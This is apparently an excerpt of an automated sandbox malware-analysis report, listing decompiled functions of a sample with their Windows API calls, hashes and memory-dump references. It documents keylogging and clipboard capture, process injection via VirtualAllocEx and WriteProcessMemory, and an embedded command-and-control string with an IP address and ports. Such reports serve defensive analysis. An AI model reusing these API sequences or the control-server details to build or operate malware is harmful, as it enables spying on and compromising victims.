                                                                                                                                                                      • Opcode ID: 9ba81a701cce433db93d3201aaa6458b7feb1eefe09dcbeb2de600b9bf0ba812
                                                                                                                                                                      • Instruction ID: e6c255c04c2e00166e273bee50597d4f1647cf6036632954b7c99c94a280edba
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ba81a701cce433db93d3201aaa6458b7feb1eefe09dcbeb2de600b9bf0ba812
                                                                                                                                                                      • Instruction Fuzzy Hash: ADE0ECB9944701EFEB18FBA5D909E7D7775AF44B11F200249E101AF2A1CB799940DB21
                                                                                                                                                                      Function 02C67175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C67181
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                        • Part of subcall function 02C67156: __getptd_noexit.LIBCMT ref: 02C6715B
                                                                                                                                                                        • Part of subcall function 02C67156: __freeptd.LIBCMT ref: 02C67165
                                                                                                                                                                        • Part of subcall function 02C67156: ExitThread.KERNEL32 ref: 02C6716E
                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 02C671A2
                                                                                                                                                                        • Part of subcall function 02C69C41: __getptd_noexit.LIBCMT ref: 02C69C47
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 418257734-0
                                                                                                                                                                      • Opcode ID: d93decb55ab0ab3670bfeb01bdb2bc244de8e06d7b72f3416f03d9b24b16aa35
                                                                                                                                                                      • Instruction ID: 61291a28bc03332b9270f62ca6dddde4bf8b7b0f5b059ef5c5ac7fb4f3d83525
                                                                                                                                                                      • Opcode Fuzzy Hash: d93decb55ab0ab3670bfeb01bdb2bc244de8e06d7b72f3416f03d9b24b16aa35
                                                                                                                                                                      • Instruction Fuzzy Hash: EFE0ECB1900604AFE708ABA0C989E7D7776EF04705F204059E1025B2A1DA75A944FF24
                                                                                                                                                                      Function 03786403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock.LIBCMT ref: 0378641B
                                                                                                                                                                        • Part of subcall function 03788E5B: __mtinitlocknum.LIBCMT ref: 03788E71
                                                                                                                                                                        • Part of subcall function 03788E5B: __amsg_exit.LIBCMT ref: 03788E7D
                                                                                                                                                                        • Part of subcall function 03788E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03783F06,0000000D,03796340,00000008,03783FFF,00000000,?,037810F0,00000000,03796278,00000008,03781155,?), ref: 03788E85
                                                                                                                                                                      • __tzset_nolock.LIBCMT ref: 0378642C
                                                                                                                                                                        • Part of subcall function 03785D22: __lock.LIBCMT ref: 03785D44
                                                                                                                                                                        • Part of subcall function 03785D22: ____lc_codepage_func.LIBCMT ref: 03785D8B
                                                                                                                                                                        • Part of subcall function 03785D22: __getenv_helper_nolock.LIBCMT ref: 03785DAD
                                                                                                                                                                        • Part of subcall function 03785D22: _free.LIBCMT ref: 03785DE4
                                                                                                                                                                        • Part of subcall function 03785D22: _strlen.LIBCMT ref: 03785DEB
                                                                                                                                                                        • Part of subcall function 03785D22: __malloc_crt.LIBCMT ref: 03785DF2
                                                                                                                                                                        • Part of subcall function 03785D22: _strlen.LIBCMT ref: 03785E08
                                                                                                                                                                        • Part of subcall function 03785D22: _strcpy_s.LIBCMT ref: 03785E16
                                                                                                                                                                        • Part of subcall function 03785D22: __invoke_watson.LIBCMT ref: 03785E2B
                                                                                                                                                                        • Part of subcall function 03785D22: _free.LIBCMT ref: 03785E3A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1828324828-0
                                                                                                                                                                      • Opcode ID: ff007393626b9c7e30bf2768d0c731eac790686368c15427f3ddc110ff803dc2
                                                                                                                                                                      • Instruction ID: 5062776c0552e838523e6a64df50309f87d340ba2a8723a7e78542d60bc6959c
                                                                                                                                                                      • Opcode Fuzzy Hash: ff007393626b9c7e30bf2768d0c731eac790686368c15427f3ddc110ff803dc2
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0127D8C2B11E7CA26FBE1B64AB0CB2706BD8F35F90875AE65429484DA740241C663
                                                                                                                                                                      Function 02C6474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 02C64755
                                                                                                                                                                        • Part of subcall function 02C63260: __wcsrev.LIBCMT ref: 02C80655
                                                                                                                                                                      Strings
                                                                                                                                                                      • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 02C64750
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcsrevlstrlen
                                                                                                                                                                      • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                                                                      • API String ID: 4062721203-291094236
                                                                                                                                                                      • Opcode ID: 34d13ad8bcafab8ce877011e711ceb5f771b5f9e1a63b73d8a8a5f93b7c68d9d
                                                                                                                                                                      • Instruction ID: de45b46d7bb1ab293739d09cc163a8eda0f62893d8122cbf341fcb5404f13dad
                                                                                                                                                                      • Opcode Fuzzy Hash: 34d13ad8bcafab8ce877011e711ceb5f771b5f9e1a63b73d8a8a5f93b7c68d9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 22C08CB2288208CFF70036D59088B3C33A8EB23F55F608435E905CA402DA52CC1097F1
                                                                                                                                                                      Function 03776EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCloseKey.ADVAPI32(80000001,03776E9A), ref: 03776EC9
                                                                                                                                                                      • RegCloseKey.ADVAPI32(75BF73E0), ref: 03776ED2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                      • Opcode ID: b5dc0bcab768d16ce5b5672b08c2a893646653590d5112868453fc6c3adc27a9
                                                                                                                                                                      • Instruction ID: f7b32d8a34421b8490bd49734d4803b71b74bd77516c997c5841f274dcaf045e
                                                                                                                                                                      • Opcode Fuzzy Hash: b5dc0bcab768d16ce5b5672b08c2a893646653590d5112868453fc6c3adc27a9
                                                                                                                                                                      • Instruction Fuzzy Hash: 42C04C72D0102C67CA10F7A8ED4494977B85B4C110F1185C2A104A3118C634AD418F90
                                                                                                                                                                      Function 02C6608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                      • Opcode ID: 06535327de1ca5998245ab8d7172d0ed8ce594706d877fad5d5c67ef1d90a131
                                                                                                                                                                      • Instruction ID: 57a44c445d0b198999ac25d0468117a3c52d6df824c46623fa712cffb4da4a33
                                                                                                                                                                      • Opcode Fuzzy Hash: 06535327de1ca5998245ab8d7172d0ed8ce594706d877fad5d5c67ef1d90a131
                                                                                                                                                                      • Instruction Fuzzy Hash: 82E0D874D08205EEDB14CB51D5C8BFD77B57B50744F60418DD4067B484D3782B08CAD5
                                                                                                                                                                      Function 02C65E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                      • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                      • Instruction ID: 806db0ecaefa552d8a1fc379a59001298b3ac83a8110ea9151db669327c53a9c
                                                                                                                                                                      • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                      • Instruction Fuzzy Hash: 07C08C24C4CB9CE9D42099231DCD178BAE04B54612F1004EFE90B36D80A0A52580D6EA
                                                                                                                                                                      Function 02C64274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 02C80693
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: 446d9c4d64152f38f0cb9bce3d17ce7aa4d44a9082bc5af10959afb8066f576e
                                                                                                                                                                      • Instruction ID: 9017f776421c13bced35e10a1afcbbf2d0650d484897eb72a6dad65c08d12210
                                                                                                                                                                      • Opcode Fuzzy Hash: 446d9c4d64152f38f0cb9bce3d17ce7aa4d44a9082bc5af10959afb8066f576e
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EC04828A8C225EAF53422532C8BB342A043B47B69F70872BF6236D8C259900098C6A3
                                                                                                                                                                      Function 02C660DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C7FAB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                      • Opcode ID: 79738dfc71dd6e283ce9795dfb8062d999699cb0a2e72741be05d8ced1d6796e
                                                                                                                                                                      • Instruction ID: 2c40027be3cb9e019c39bfcbb2d291982f5d220b23dfd900ebb3723602abb261
                                                                                                                                                                      • Opcode Fuzzy Hash: 79738dfc71dd6e283ce9795dfb8062d999699cb0a2e72741be05d8ced1d6796e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD012B4204500C7D300AB51C5C472AB2E2BF44310F20C919C46EC3F10C638E841CA91
                                                                                                                                                                      Function 02C7F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      • Opcode ID: 3a744b831a4dab7826d3086da32d44f2c1aa07f1b6fd09a0d56cc0f0eeb5603b
                                                                                                                                                                      • Instruction ID: 18f9841530cbc21c3024087780167970652b91d6ac102d567b1833b610b76a05
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a744b831a4dab7826d3086da32d44f2c1aa07f1b6fd09a0d56cc0f0eeb5603b
                                                                                                                                                                      • Instruction Fuzzy Hash: 419002287C4141AB630009226888755265855146C334419189803C0810D61082549554
                                                                                                                                                                      Function 02C65EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32 ref: 02C65EB2
                                                                                                                                                                        • Part of subcall function 02C66F17: _malloc.LIBCMT ref: 02C66F31
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 617756273-0
                                                                                                                                                                      • Opcode ID: a1015d62d96f2bb06a98dce862ee5ae3a9ce1ec7a1abcc17f512a50243bdca10
                                                                                                                                                                      • Instruction ID: 5263b21e11d0abfeb719e16d7f263ee4fdbb545174b79589bbca420ae604665c
                                                                                                                                                                      • Opcode Fuzzy Hash: a1015d62d96f2bb06a98dce862ee5ae3a9ce1ec7a1abcc17f512a50243bdca10
                                                                                                                                                                      • Instruction Fuzzy Hash: A8D022B2D042028FE7A07DA104C923EA0622780288FA4813DC60B82900D6760E08C7D3

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 0377E850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E8A9
                                                                                                                                                                      • Sleep.KERNEL32(00000001,?,?,?,0377604D), ref: 0377E8B3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377E8BF
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377E8D2
                                                                                                                                                                      • InterlockedExchange.KERNEL32(037A1F08,00000000), ref: 0377E8DA
                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0377E8E2
                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0377E8EA
                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 0377E8FB
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0377E90C
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377E985
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E9A3
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0377E9AC
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0377E9B2
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0377E9CA
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0377E9E4
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377EA02
                                                                                                                                                                      • lstrlenW.KERNEL32(03795B48,?,00000000), ref: 0377EA16
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,03795B48,00000000), ref: 0377EA25
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377EA2C
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0377EA38
                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0377EABC
                                                                                                                                                                      • lstrlenW.KERNEL32(0379B4A8), ref: 0377EB0B
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EB1D
                                                                                                                                                                      • lstrlenW.KERNEL32(0379B4D0), ref: 0377EB3E
                                                                                                                                                                      • lstrlenW.KERNEL32(0379B4D0), ref: 0377EB61
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EB7F
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EB95
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EBBF
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0377EC0B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0377EC21
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0377EC3B
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377EC59
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0377EC69
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0377EC74
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377EC7B
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0377EC88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                                                                      • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                                                                      • API String ID: 1637302245-2373594894
                                                                                                                                                                      • Opcode ID: 341111de63c16d434c326c2262a06c17f1562f266178c1e7a74a57cea80fcab9
                                                                                                                                                                      • Instruction ID: c1b32abe8670ab48197f0d915d42891ed3cc00832f1dc7c989d48fd35295ffdb
                                                                                                                                                                      • Opcode Fuzzy Hash: 341111de63c16d434c326c2262a06c17f1562f266178c1e7a74a57cea80fcab9
                                                                                                                                                                      • Instruction Fuzzy Hash: 71C1F374640704EFEB20EF24DC89FAA7BB4FB48700F048A9AE25AC61D5D7789585CF61
                                                                                                                                                                      Function 037777E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 03777804
                                                                                                                                                                      • _memset.LIBCMT ref: 03777850
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03777864
                                                                                                                                                                        • Part of subcall function 03778720: _vswprintf_s.LIBCMT ref: 03778731
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777893
                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 037778DA
                                                                                                                                                                        • Part of subcall function 03777740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037778FC), ref: 03777756
                                                                                                                                                                        • Part of subcall function 03777740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037778FC,?,?,?,?,?,?,74DF0630), ref: 0377775D
                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377790A
                                                                                                                                                                      • _memset.LIBCMT ref: 03777923
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377793B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777944
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777956
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777959
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377796B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0377796E
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777980
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777983
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377798B
                                                                                                                                                                      • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777992
                                                                                                                                                                      • _memset.LIBCMT ref: 037779B4
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037779CA
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 037779FF
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03777A1B
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03777A43
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03777A58
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,037776F0,00001000,00000000), ref: 03777A72
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03777A90
